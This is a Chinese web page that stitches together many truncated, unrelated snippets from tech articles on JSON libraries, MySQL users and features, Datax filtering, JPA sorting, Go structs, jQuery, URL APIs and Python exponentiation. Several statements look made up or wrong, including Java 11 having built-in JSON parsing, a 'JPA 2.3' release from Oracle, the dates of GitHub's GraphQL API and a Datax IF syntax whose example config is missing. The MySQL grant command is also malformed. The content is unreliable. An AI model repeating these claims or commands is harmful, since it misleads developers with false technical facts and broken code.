如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...及，如何高效、准确地处理JSON与Java对象间的转换成为开发者关注的重点。Jackson库作为Java世界中最常用的JSON处理工具之一，提供了丰富的功能以满足不同场景下的需求。 除了上述文章介绍的基础用法外，Jackson库还支持将JSON转换为自定义的Java Bean对象，并能处理复杂嵌套结构的数据。例如，通过注解的方式，可以指定JSON字段与Java类属性之间的映射关系，使得转换过程更加智能且灵活。此外，对于可能存在的空值或异常情况，Jackson也提供了多种配置选项供开发者进行容错处理。 另一方面，Gson、Fastjson等其他开源库也是处理JSON与Java对象互转的有效工具，各有优劣，开发者可以根据项目需求和性能指标选择合适的库。同时，最新的Java版本（如Java 11及以上）已经原生支持JSON操作，例如使用JsonParser解析JSON，或者通过内置的JSON-B实现进行序列化和反序列化。 值得注意的是，在处理大量数据或高并发场景时，对JSON转换性能的优化至关重要。这包括但不限于选择高效的JSON库、合理设计数据模型以减少转换开销、利用缓冲技术提高IO效率等手段。因此，深入理解并掌握这些技术点，不仅能够提升程序性能，也能更好地应对实际开发中的各种挑战。

...种SQL语句进行数据查询、更新、删除等操作，并提供了用户账户管理和权限控制机制。 身份验证插件 , 在MySQL中，身份验证插件是一种可扩展的安全模块，用于处理用户登录过程中的身份验证工作。根据不同的身份验证插件设置，MySQL服务器可以采用不同的方式验证用户提供的用户名和密码（或其它凭证），如使用加密算法对比密码、通过PAM系统进行多因素认证或者与LDAP目录服务集成进行集中式身份验证。在文章中，它被提及作为控制和管理用户登录权限的一种手段。 加密密码（authentication_string） , 在MySQL的用户表（mysql.user）中，authentication_string 字段存储了用户的经过加密处理的密码信息。为了保护数据库安全，MySQL并不直接保存明文密码，而是将其通过特定的加密算法进行加密存储。当用户尝试登录时，MySQL服务器会将输入的密码通过相同的加密算法处理后，与authentication_string字段中的值进行比对，只有匹配成功才能允许用户登录。在文中，它是查看和理解MySQL用户权限配置时的一个关键属性。

...库中表基本信息的基础操作后，进一步掌握更高级的SQL查询语句和优化策略将有助于提升数据管理与分析效率。近期，MySQL 8.0版本推出了一系列新特性，如窗口函数、JSON字段支持全文检索等，使得复杂查询与大数据处理更为便捷（来源：MySQL官网，2022年更新公告）。同时，随着云服务的普及，AWS RDS for MySQL、阿里云RDS等托管数据库服务提供了自动备份、性能监控、一键扩展等功能，极大地简化了MySQL的运维工作。 此外，对于表结构设计及索引优化的理解至关重要。一篇来自DBA Stack Exchange社区的热门讨论帖（发布日期：2022年5月）深入剖析了如何根据业务场景合理设计表关系，以及何时应创建唯一索引、复合索引以提高查询性能。而一篇发表于InfoQ的技术文章《MySQL性能调优实战》则从实战角度出发，详细解读了如何通过EXPLAIN分析查询执行计划、利用慢查询日志定位瓶颈，并结合实例探讨了分区表、分库分表策略在高并发场景下的应用。 综上所述，无论是紧跟MySQL最新技术动态，还是深化对数据库内部机制和性能优化的理解，都将为您的数据库管理工作带来显著提升。持续学习并实践这些进阶知识，能够帮助您更好地应对日益增长的数据管理和分析挑战。

...服务器，并对其进行批处理注册，可以按照以下步骤进行操作： //1.进入到mysql文件夹下 cd /usr/local/mysql/bin/ //2.以root用户登录mysql mysql -u root -p //3.创建新用户，并授权 create user 'yourusername'@'localhost' identified by 'yourpassword'; grant all privileges on . to 'yourusername'@'localhost'; //4.退出mysql exit 在以上代码中，你需要根据自己的实际情况修改'yourusername'和'yourpassword'，并授权给你的新用户所有权限。 如果需要进行更多的数据库操作，你可以接着使用以下命令操作： //1.进入到mysql文件夹下 cd /usr/local/mysql/bin/ //2.以新用户登录mysql mysql -u yourusername -p //3.创建新的数据库和数据表 create database yourdatabasename; use yourdatabasename; create table tablename (column1 datatype, column2 datatype, column3 datatype); //4.退出mysql exit 以上代码中，你需要将'yourdatabasename'和'tablename'替换为你需要创建的数据库名和表名，同时根据实际情况定义相应的表字段。 批处理注册MySQL服务器并不复杂，只需按照以上步骤进行操作即可。如果你对SQL语句不熟悉，也可以使用可视化工具对数据库进行操作。

...员提供了更高效便捷的操作手段。例如，基于新的窗口函数，可以更轻松地进行复杂的数据分析和统计计算；而JSON字段类型的增强则顺应了现代应用中大量非结构化数据处理的需求。 同时，对于MySQL实例的运维管理，安全性和稳定性至关重要。定期检查并更新MySQL服务器的配置文件、确保数据目录的安全权限设置，并合理利用缓存机制以提升查询效率，是每一位数据库管理人员应熟练掌握的基本功。此外，针对线上大规模并发访问场景，深入理解并运用MySQL的InnoDB存储引擎的事务处理机制、锁机制及索引策略，有助于提升系统整体性能和用户体验。 另外，在云服务日益普及的今天，各大云服务商（如AWS RDS、阿里云RDS等）提供了托管型MySQL服务，用户无需关心底层MySQL实例的具体安装位置，即可享受到便捷的数据库创建、备份恢复及监控告警等功能。但这也要求DBA们熟悉云环境下的MySQL管理工具和服务接口，以便更好地适应云计算时代的新挑战。 总之，无论是对MySQL实例进行精细的本地部署维护，还是依托于云平台实现高效便捷的数据库管理，都需要不断跟进MySQL技术的发展动态，深入理解其核心原理，并结合实际业务场景灵活运用各种优化策略，从而确保数据库系统的稳定、安全、高效运行。

...函数支持、原子DDL操作以及安全性增强等，使得MySQL在处理大数据量及复杂查询场景时表现更为出色（来源：Oracle官网新闻发布，2023年）。 此外，随着云原生时代的到来，MySQL也在适应这一趋势，各大云服务提供商如AWS、阿里云等都提供了托管版MySQL服务，用户可以便捷地部署和管理MySQL数据库，同时享受到自动备份、高可用性和弹性扩展等高级功能。例如，AWS RDS for MySQL不仅简化了数据库管理任务，还通过读副本、多可用区部署等功能确保了数据的安全与高可用性（来源：AWS官方文档，2023年）。 在实际应用层面，对于Web开发者而言，掌握如何优化MySQL插入语句以提升数据写入效率至关重要。一篇来自Stack Overflow的深度讨论中，专家们就如何避免全表锁定、利用批量插入提高性能等问题进行了详细解读，并分享了一些实战经验（来源：Stack Overflow，2023年）。通过学习这些最新的技术资讯和发展趋势，可以帮助开发者更好地应对实际开发中的挑战，最大化发挥MySQL数据库的优势，从而为构建高效稳定的应用程序提供强大支撑。

在深入理解JSON数组及其在JavaScript中的应用后，进一步探讨其在现代web开发与数据传输领域的实际应用场景及最新进展。近年来，随着RESTful API接口设计的普及，JSON作为主流的数据交换格式，在前后端交互中扮演着至关重要的角色。 例如，2021年，GitHub宣布对其API v4进行全面升级，其中就包括了对GraphQL的支持，这是一种基于JSON的强大查询语言，能够更灵活地获取和操作JSON数据结构。开发者可以利用GraphQL构建高度定制化的请求，只获取他们需要的数据，大大提升了效率并减少了网络带宽消耗。 此外，JSON Schema作为一种用于描述JSON数据结构的标准模式语言，也正在逐步获得广泛接纳。通过定义JSON数据结构的模式，可以实现对JSON数据的有效验证和约束，从而提升数据质量，并为自动化工具提供支持，如自动生成表单、文档或者代码模型。 最近，一些前沿的JavaScript框架，如React、Vue.js等，都在强化对JSON数据处理的支持，提供了便捷的方法将JSON数据映射到组件状态或视图层，简化了开发流程，提高了开发效率。 总的来说，JSON数组不仅在基础层面服务于数据交换，还在不断演进和发展中，适应了现代web服务日益复杂和高效的需求。无论是新的数据查询语言的出现，还是数据校验和前端框架层面的支持，都展现了JSON数组在未来web开发领域广阔的应用前景。

...，均采用MySQL来处理实时生成的海量数据，实现生产流程监控、设备故障预警和产品质量追溯等功能，充分印证了MySQL在工业实时数据管理领域的强大实力。 2022年，MySQL官方发布了8.0版本的重大更新，进一步提升了性能和扩展性，尤其是对InnoDB存储引擎进行了深度优化，使其在高并发读写场景下表现出更高的稳定性和响应速度。此外，新版本还强化了JSON字段类型的支持，以满足现代应用对于非结构化数据处理的需求，这也为工业领域中的复杂数据模型提供了更为灵活的解决方案。 与此同时，随着云计算服务的普及，各大云服务商如阿里云、AWS、Azure等纷纷推出MySQL托管服务，使得用户无需关注底层运维细节，即可轻松部署并高效利用MySQL进行实时数据分析。例如，某知名汽车制造商通过使用云端MySQL服务，成功搭建了一套实时数据分析平台，实现了对生产线每一道工序的精细化管理与决策支持。 总之，在工业实时数据管理领域，MySQL凭借其可靠性、高效性以及与新技术的紧密融合，持续引领着数据库技术的发展潮流，并为企业数字化转型提供坚实的数据基础架构支撑。未来，随着5G、边缘计算等新兴技术的深度融合，MySQL有望在更广泛的实时应用场景中发挥关键作用。

...过清晰的键值对结构和数组形式来描述复杂的数据对象，如个人信息、教育经历和工作经历等。 表单源码 , 表单源码是指构建网页或应用程序表单时所使用的底层代码结构，它定义了表单的字段、布局及提交方式等属性。在本文中，Json作为一种表单源码格式，能够简洁明了地组织和呈现表单数据，便于开发者编写和维护，同时方便前端与后端进行高效的数据交互和处理。 数据交换格式 , 数据交换格式是一种标准化的规则和结构，用于在网络通信或不同系统间传递信息时确保数据的一致性和可理解性。在本文提及的场景下，Json作为数据交换格式，使得微信平台上的表单数据能够在客户端与服务器之间进行准确、快速且低耗的传输，无论是在收集用户输入的信息，还是在展示已存储的数据，都能保持良好的互操作性和兼容性。

...，也可以用于数据过滤处理。本篇文章将带大家了解如何在Datax中实现数据的过滤处理。 二、基本概念介绍 首先，我们需要明确什么是数据过滤。数据过滤是指根据某些特定条件对数据进行筛选，保留符合条件的数据，删除不符合条件的数据的过程。在Datax中，我们可以使用IF判断语句来实现数据过滤。 三、IF判断语句的基本语法 在Datax中，IF判断语句的基本语法如下： IF [condition] THEN [true part] ELSE [false part] 其中，[condition]是我们要判断的条件，[true part]是当条件为真时执行的操作，[false part]是当条件为假时执行的操作。 四、实例分析 下面我们就通过一个具体的实例来学习如何在Datax中实现数据的过滤处理。 假设我们有一个订单表，包含字段id, name, amount, status等，我们想要找出所有状态为"已完成"的订单。 1. 首先，我们在配置文件中添加以下内容 2. 在上述配置文件中，我们首先定义了一个源通道（in_channel）和目标通道（out_channel）。源通道通过SQL查询获取所有的订单，然后目标通道通过IF判断语句筛选出状态为"已完成"的订单，并将其插入到新的表filtered_orders中。 五、总结 以上就是在Datax中实现数据过滤处理的一个简单例子。瞧瞧这个例子，咱们就能明白，在Datax这玩意儿里头，咱能够超级轻松地用IF判断语句给数据做个筛选处理，简直不要太方便！如果你也想在你的项目中实现数据过滤处理，不妨试试看Datax吧！

...。 近日，随着大数据处理需求的增长，Apache Calcite开源项目发布了新的优化方案，针对SQL查询中的排序操作进行了深度优化。Calcite作为动态数据管理框架的核心组件，支持包括JDBC在内的多种接口，可以高效执行包含复杂ORDER BY子句的大规模数据查询任务，极大地提升了Java应用程序对数据库进行排序操作的性能。 同时，在Oracle最新发布的Java持久化API（JPA）2.3版本中，对于实体类的排序也有了更灵活的支持。开发者不仅可以利用注解@OrderBy对字段进行默认排序设置，还可以在运行时动态调整排序策略，这无疑为Java开发者在处理大量数据排序场景时提供了更多便利。 此外，考虑到数据库性能调优的重要性，建议读者进一步研究索引对排序查询的影响。适当的索引设计能够显著加快数据库的排序速度，特别是在涉及大量数据且频繁进行排序操作的应用场景下。例如，MySQL的B+树索引结构天然适合用于支持ORDER BY和LIMIT操作，合理创建和使用索引将极大提升SQL排序查询效率。 综上所述，虽然Java中基于SQL的排序操作看似基础，但在现代数据库管理和应用开发中，它与高级查询优化技术、持久化框架特性以及底层数据库索引原理等多方面知识紧密相连，值得广大开发者持续关注并深入学习。

...时，需要先理解其内部字段名、数据类型及层级关系。 数据库表 , 在关系型数据库系统中，数据库表是组织和存储数据的基本单元。它由列（字段）和行（记录）组成，每一列代表一种属性或数据类型，每一行则代表一个实体的实例或一条记录。根据JSON数据的结构创建数据库表意味着将JSON中的各个键映射为表中的列，并将键对应的值作为数据插入到相应的行中。 JSON解析器 , JSON解析器是一种软件组件，用于将JSON格式的字符串转换成特定编程语言能够识别和操作的数据结构，如对象、数组等。在处理JSON数据转换至数据库表的过程中，解析器是不可或缺的工具，它可以读取JSON字符串并将其解构为便于进一步处理的内在数据形式，使得开发者可以提取所需数据并构建SQL语句以插入到数据库表中。例如，在JavaScript中，JSON.parse()方法就是一种内置的JSON解析器。

...似的序列化和反序列化操作。而在Java环境中，Jackson库是处理JSON数据的首选工具，它提供了高效且功能丰富的API进行对象与JSON之间的转换。 近年来，随着API经济的发展，JSON作为HTTP请求和响应的标准格式，其重要性进一步提升。例如，GraphQL这一现代API查询语言就以JSON格式传递查询和结果，提供了一种更灵活、高效的客户端与服务器间数据交互方式。 此外，在数据存储领域，MongoDB等NoSQL数据库更是直接以内置支持JSON的BSON格式存储文档型数据，极大地简化了数据模型设计和查询过程。 值得注意的是，随着JSON Web Tokens（JWT）的普及，JSON还在安全认证方面发挥着关键作用。JWT利用JSON格式封装用户信息，通过加密算法保证数据传输的安全性，被广泛应用于无状态、跨域的身份验证场景。 总之，从数据交换、API设计到数据存储和安全认证，JSON已成为现代软件开发不可或缺的一部分。深入理解和掌握JSON及其相关工具和技术，对于提升开发者工作效率和应用性能具有重要意义。未来，随着技术演进及新应用场景的拓展，JSON的作用和影响力预计将进一步增强。

...表示复杂的数据结构如数组和对象。 结构体（在Go语言中） , 在Go编程语言中，结构体是一种自定义复合数据类型，允许开发者组合多个不同类型的字段来创建新的数据类型。结构体成员可以是任何基本类型或自定义类型，甚至可以包含其他结构体作为其字段，形成嵌套结构。在处理JSON数据时，Go语言的结构体被用来映射JSON对象的结构，通过为结构体字段添加json标签，可以实现JSON数据与结构体字段之间的序列化和反序列化操作。 序列化与反序列化 , 序列化是将数据结构或对象转换为可以进行持久化存储或网络传输的形式（通常为字节流）的过程。在Go语言处理JSON时，结构体的序列化是指将结构体实例转化为JSON字符串；而反序列化则是相反的过程，即将JSON字符串解码恢复成相应的结构体实例。Go语言内置的encoding/json包提供了对JSON数据进行序列化和反序列化的支持，使得程序能够方便地与JSON格式的数据进行交互。

...对象模型（DOM）的操作、事件处理和异步HTTP请求（AJAX）等工作。通过提供易于理解且简洁的API，jQuery使得Web开发人员能够快速高效地构建功能丰富、交互性强的网页应用。在本文中，jQuery被用于创建一个动态抽奖商品方格效果，包括生成商品列表、添加点击事件以及实现随机抽奖逻辑。 DOM操作 , DOM（Document Object Model）是W3C组织制定的一种标准编程接口，它将HTML和XML文档表示为树形结构，允许程序和脚本动态更新、添加、删除或修改页面内容、样式和结构。在文中，jQuery通过其强大的DOM操作能力，实现了遍历数组并为每个商品创建相应的HTML元素（方格），并将这些元素添加到页面容器中。 AJAX , Asynchronous JavaScript and XML（异步JavaScript与XML）是一种创建快速动态网页的技术，它允许网页在不重新加载整个页面的情况下从服务器获取数据并在网页上进行局部刷新。虽然名称中包含XML，但在现代Web开发中，JSON格式的数据交换更为常见。在本文提到的场景中，并未直接使用AJAX进行数据获取，但jQuery库本身支持丰富的AJAX功能，这有助于提升用户体验，例如可以用来实时查询或更新抽奖结果而不打断用户的操作流程。

...式之外，开发者还可以利用现代浏览器提供的API来更精细地操作和解析URL。 例如，History API允许开发者在不刷新页面的情况下修改浏览器的历史记录，并能获取到详细的URL信息。通过history.pushState()方法，可以更新当前URL而不触发页面重载，同时可以通过window.history.state或history.replaceState()来获取或修改当前历史记录的状态信息，这对于SPA（Single Page Application）应用来说尤其重要。 另外，对于URL参数的解析，可以使用URLSearchParams接口，它提供了方便的方法来处理URL查询字符串。例如，new URLSearchParams(window.location.search)将返回一个可迭代对象，包含了当前URL查询字符串中的所有参数及其值。 此外，在跨域资源共享（CORS）场景下，尽管jQuery的$.get方法并不适用于获取当前页面URL，但在异步请求时，服务端可以通过HTTP头部的Referer字段获知请求来源URL，这在安全策略和日志记录等方面有其特定的应用价值。 总的来说，随着Web标准的演进与丰富，我们有了更多灵活且强大的工具来处理URL相关问题，从而更好地优化用户体验并提升应用性能。开发者应持续关注这些技术和最佳实践，以适应不断变化的Web开发环境。

...运算方法。 例如，在处理大规模数据集时，通过NumPy的numpy.power()函数可以快速进行数组元素的幂运算，极大地提升了处理复杂模型训练、特征工程等场景下的计算性能。此外，对于涉及复杂数学概念如指数函数、对数函数等高级运算，Python的SciPy库也提供了丰富且高效的实现。 同时，对于初学者或者想要深化理解计算机如何实现快速幂运算的人来说，可以进一步研究算法层面的“快速幂”算法。这种算法利用分治思想，将指数运算转化为一系列位操作，从而大大降低了时间复杂度，尤其在处理大整数幂运算时优势明显，是ACM竞赛、密码学等领域必备的基础知识。 综上所述，Python中幂运算符的高效运用只是冰山一角，结合现代编程库以及底层算法原理的学习与探索，能够帮助我们在实际项目开发和科学研究中更好地驾驭各类数学运算挑战。